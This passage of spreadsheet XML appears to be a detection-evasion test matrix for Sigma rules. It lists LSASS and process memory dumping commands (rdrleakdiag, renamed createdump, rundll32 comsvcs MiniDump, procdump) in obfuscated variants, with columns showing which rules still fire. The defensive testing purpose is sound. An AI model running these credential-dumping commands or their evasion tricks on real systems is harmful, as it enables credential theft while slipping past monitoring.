          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E197" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p"" 1337 "/o" C:\temp\ /fUlLMemdmp</t>
        </is>
      </c>
      <c r="F197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I197" s="44" t="n"/>
      <c r="J197" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K197" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="n"/>
      <c r="B198" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C198" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D198" s="44" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E198" s="44" t="inlineStr">
        <is>
          <t>rdrleakdiag.exe "/p" 1337 "/o"" C:\temp\ /FUlLMemdMp</t>
        </is>
      </c>
      <c r="F198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I198" s="43" t="n"/>
      <c r="J198" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K198" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="n"/>
      <c r="B199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C199" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D199" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E199" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -u -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H199" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J199" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K199" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="n"/>
      <c r="B200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C200" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D200" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E200" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J200" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K200" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="n"/>
      <c r="B201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C201" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D201" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E201" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G201" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H201" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I201" s="4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J201" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K201" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="n"/>
      <c r="B202" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C202" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D202" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E202" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" /"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H202" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J202" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K202" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="n"/>
      <c r="B203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C203" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D203" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E203" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -f C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H203" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J203" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K203" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="n"/>
      <c r="B204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C204" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D204" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E204" s="44" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H204" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J204" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K204" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="n"/>
      <c r="B205" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C205" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D205" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E205" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I205" s="43" t="n"/>
      <c r="J205" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K205" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="n"/>
      <c r="B206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C206" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D206" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E206" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I206" s="43" t="n"/>
      <c r="J206" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K206" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="n"/>
      <c r="B207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C207" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D207" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E207" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --nAME /TMP/lsAss_dUmp.BIN 632</t>
        </is>
      </c>
      <c r="F207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I207" s="43" t="n"/>
      <c r="J207" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="n"/>
      <c r="B208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C208" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D208" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E208" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FUlL --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I208" s="44" t="n"/>
      <c r="J208" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="n"/>
      <c r="B209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C209" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D209" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E209" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fULL /"-name" -"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I209" s="44" t="n"/>
      <c r="J209" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K209" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="n"/>
      <c r="B210" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C210" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D210" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E210" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FuLL /"-name" /tMP/lSaSS_DuMp.bin 632</t>
        </is>
      </c>
      <c r="F210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I210" s="44" t="n"/>
      <c r="J210" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K210" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="n"/>
      <c r="B211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C211" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D211" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E211" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tMp/LSaSs_DUMp.bIn 632</t>
        </is>
      </c>
      <c r="F211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I211" s="44" t="n"/>
      <c r="J211" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K211" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="n"/>
      <c r="B212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C212" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D212" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E212" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fulL --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I212" s="44" t="n"/>
      <c r="J212" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K212" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="n"/>
      <c r="B213" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C213" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D213" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E213" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe /"-full" -"-name" /TmP/lSass_dUMp.BIN 632</t>
        </is>
      </c>
      <c r="F213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I213" s="44" t="n"/>
      <c r="J213" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K213" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="n"/>
      <c r="B214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C214" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D214" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E214" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --NaMe /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I214" s="44" t="n"/>
      <c r="J214" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K214" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C215" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D215" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E215" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" -"-name" /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I215" s="44" t="n"/>
      <c r="J215" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K215" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="n"/>
      <c r="B216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C216" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D216" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E216" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="4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216" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K216" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="n"/>
      <c r="B217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C217" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D217" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E217" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I217" s="43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217" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K217" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="43" t="n"/>
      <c r="B218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C218" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D218" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E218" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe comsvcs.dll,#131096 600 C:\temp\lsass.dmp full</t>
        </is>
      </c>
      <c r="F218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I218" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J218" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K218" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="n"/>
      <c r="B219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C219" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D219" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E219" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp
enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I219" s="44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J219" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K219" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="n"/>
      <c r="B220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C220" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D220" s="44" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E220" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J220" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K220" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="n"/>
      <c r="B221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lsass_dmp_cli_keywords</t>
        </is>
      </c>
      <c r="C221" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine</t>
        </is>
      </c>
      <c r="D221" s="44" t="inlineStr">
        <is>
          <t>ffa6861c-4461-4f59-8a41-578c39f3f23e</t>
        </is>
      </c>
      <c r="E221" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" procdump.exe -"ma" ls^ass.exe C:\temp\ls^ass.dmp</t>
        </is>
      </c>
      <c r="F221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I221" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J221" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K221" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="n"/>
      <c r="B222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lsass_dmp_cli_keywords</t>
        </is>
      </c>
      <c r="C222" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine</t>
        </is>
      </c>
      <c r="D222" s="44" t="inlineStr">
        <is>
          <t>ffa6861c-4461-4f59-8a41-578c39f3f23e</t>
        </is>
      </c>
      <c r="E222" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" procdump.exe -Ma ls^ass.exe C:\temp\ls^ass.dmp</t>
        </is>
      </c>
      <c r="F222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998); Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J222" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K222" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="n"/>
      <c r="B223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lsass_dmp_cli_keywords</t>
        </is>
      </c>
      <c r="C223" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine</t>
        </is>
      </c>
      <c r="D223" s="44" t="inlineStr">
        <is>
          <t>ffa6861c-4461-4f59-8a41-578c39f3f23e</t>
        </is>
      </c>
      <c r="E223" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -mA ls^ass.exe C:\temp\ls^ass.dmp</t>
